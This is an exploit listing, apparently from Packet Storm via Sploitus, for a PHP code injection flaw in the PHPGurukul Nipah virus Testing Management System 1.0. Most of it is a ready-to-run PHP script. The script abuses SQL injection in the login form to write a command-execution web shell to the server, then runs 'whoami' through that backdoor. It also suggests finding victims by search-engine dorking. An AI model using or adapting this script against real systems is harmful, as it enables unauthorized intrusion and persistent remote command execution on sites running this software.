Share
## https://sploitus.com/exploit?id=PACKETSTORM:181479
=============================================================================================================================================  
| # Title : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] This payload inject php code contains a back door.  
  
[+] Line 16 + 19 Set your Target.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php  
  
[+] payload :  
  
  
<?php  
// المكتبات المطلوبة  
function send_request($url, $data) {  
$options = [  
'http' => [  
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
'method' => 'POST',  
'content' => http_build_query($data),  
]  
];  
$context = stream_context_create($options);  
return file_get_contents($url, false, $context);  
}  
  
// تحديد URL ثابت  
$url = 'http://localhost/nipah-tms/';  
  
// مسار ثابت لرفع الملف  
$path = 'C:\www\nipah-tms\uploaded.php';  
$path = str_replace("\\", "\\\\", $path);  
  
// حمولة الباب الخلفي  
$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';  
  
// إرسال ملف PHP يحتوي على الباب الخلفي  
$payload = [  
'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",  
'password' => 'test',  
'login' => ''  
];  
send_request($url . "/login.php", $payload);  
  
echo "[+] PHP backdoor uploaded successfully at $path\n";  
  
// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي  
$response = file_get_contents($url . "uploaded.php?cmd=whoami");  
echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";  
?>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================